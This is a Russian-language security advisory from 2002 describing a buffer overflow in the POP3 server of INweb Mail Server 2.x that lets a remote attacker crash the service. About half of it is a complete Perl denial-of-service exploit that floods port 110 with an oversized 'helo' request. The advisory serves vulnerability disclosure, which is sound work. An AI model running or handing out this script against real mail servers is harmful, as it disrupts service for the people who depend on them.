Переполнение буфера в POP3 сервере в INweb Mail Server

Дата публикации:
14.11.2002
Всего просмотров:
707
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
INweb Mail Server 2.x
Описание: INweb Mail Server - POP3 и SMTP почтовый сервер для Windows платформ.

POP3 server, включенный в INweb Mail Server, не в состоянии обработать некоторые типы запросов. Представляя специально обработанный запрос к POP3 серверу, удаленный атакующий может разрушить систему. Эксплоит:

#!/usr/bin/perl -w
use IO::Socket;
$host = $ARGV[0];
$port = "110";
$evil = "A" x 16000;
print "INweb Mail Server v2.01 Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
            new(Proto=>"tcp",
            PeerAddr=>$host,
            PeerPort=>$port)
            || die "Connection failed.\n";
print "Attacking...\n";
print $socket "helo:$evil\n\n";
close($socket);
print "\nConnection closed. Finished.\n\n";

уязвимость обнаружена в INweb Mail Server v2.01

Ссылки: INweb Mail Server v2.01 Denial of Service Vulnerability

или введите имя

CAPTCHA